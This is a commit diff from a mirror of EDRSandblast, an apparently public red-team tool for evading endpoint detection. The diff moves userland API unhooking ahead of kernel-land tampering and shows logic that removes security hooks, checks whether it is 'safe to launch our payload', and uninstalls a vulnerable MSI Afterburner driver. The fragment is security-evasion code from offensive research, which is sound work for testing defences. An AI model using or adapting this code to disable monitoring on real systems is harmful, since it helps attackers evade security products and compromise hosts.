Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-10 17:31:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

execute userland hook removal before kerneland tampering activity

Browse Source
This commit is contained in:
Maxime Meignan
2021-12-31 10:02:05 +01:00
parent d676ff82f5
commit 3c81bd4f26
1 changed files with 16 additions and 15 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast/EDRSandblast.c
+16 -15
View File
@@ -177,7 +177,7 @@ Other options:\n\
} }
} }
// Command line option consistency checks // Command line option consistency checks.
if (startMode == cmd && !kernelMode) { if (startMode == cmd && !kernelMode) {
_tprintf(TEXT("'cmd' mode needs kernel-land unhooking to work, please enable --kernelmode\n")); _tprintf(TEXT("'cmd' mode needs kernel-land unhooking to work, please enable --kernelmode\n"));
return EXIT_FAILURE; return EXIT_FAILURE;
@@ -195,6 +195,19 @@ Other options:\n\
BOOL isSafeToExecutePayload = TRUE; BOOL isSafeToExecutePayload = TRUE;
if (userMode) {
_tprintf(TEXT("Loaded DLLs in current process:\n"));
hooks = searchHooks(NULL);
_tprintf(TEXT("\n\n"));
if (startMode != audit) {
for (hook* ptr = hooks; ptr->disk_function != NULL; ptr++) {
printf("Unhooking %s using method %ld ...\n", ptr->functionName, unhook_method);
unhook(ptr, unhook_method);
}
}
}
if (kernelMode) { if (kernelMode) {
if (_tcslen(driverPath) == 0) { if (_tcslen(driverPath) == 0) {
TCHAR separator[] = TEXT("\\"); TCHAR separator[] = TEXT("\\");
@@ -263,20 +276,7 @@ Other options:\n\
} }
} }
if (userMode) {
_tprintf(TEXT("Loaded DLLs in current process:\n"));
hooks = searchHooks(NULL);
_tprintf(TEXT("\n\n"));
}
if (startMode != audit) { if (startMode != audit) {
if (userMode) {
for (hook* ptr = hooks; ptr->disk_function != NULL; ptr++) {
printf("Unhooking %s using method %ld ...\n", ptr->functionName, unhook_method);
unhook(ptr, unhook_method);
}
}
if (isSafeToExecutePayload) { if (isSafeToExecutePayload) {
_tprintf(TEXT("[+] Process is \"safe\" to launch our payload\n")); _tprintf(TEXT("[+] Process is \"safe\" to launch our payload\n"));
@@ -363,6 +363,8 @@ Other options:\n\
} }
_tprintf(TEXT("\n\n")); _tprintf(TEXT("\n\n"));
} }
// If the the payload is not safe to execute.
else { else {
_tprintf(TEXT("[+] Process is NOT \"safe\" to launch our payload, removing monitoring and starting another process...\n")); _tprintf(TEXT("[+] Process is NOT \"safe\" to launch our payload, removing monitoring and starting another process...\n"));
#ifdef _DEBUG #ifdef _DEBUG
@@ -487,7 +489,6 @@ Other options:\n\
} }
} }
// TODO : Fix Windows error 0x00000422 that happens on 1 on 2 restart after uninstall.
if (kernelMode && removeVulnDriver) { if (kernelMode && removeVulnDriver) {
Sleep(5000); Sleep(5000);
_tprintf(TEXT("[*] Uninstalling vulnerable MSI Afterburner driver...\n")); _tprintf(TEXT("[*] Uninstalling vulnerable MSI Afterburner driver...\n"));